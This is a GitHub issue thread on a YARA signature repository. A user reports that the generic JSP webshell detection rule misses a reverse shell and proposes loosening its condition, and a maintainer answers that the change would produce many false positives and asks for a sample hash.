search

Neo23x0 / signature-base

YARA signature and IOC database for my scanners and tools
Other
2.44k stars 599 forks source link

Generic JSP Webshell false negative #271

Open orapic opened 1 year ago

orapic commented 1 year ago

Hi,

I stumbled upon a reverse jsp shell and the generic rule for jsp webshells WEBSHELL_JSP_Generic returns a false positive due to the nature of the reverse shell.

Changing this:

and (
            any of ( $input* ) and
            any of ( $req* )
        )

to this:

and (
            any of ( $input* ) or
            any of ( $req* )
        )

Solves the issue. This might apply to the other JSP rules. I dont know how much false positives is that going to give but I think its preferable to have false positives than false negatives.

Kind regards,

ruppde commented 1 year ago

hi,

that change would produce many false positives. Can you upload the webshell to virustotal and send me the hash?

regards arnim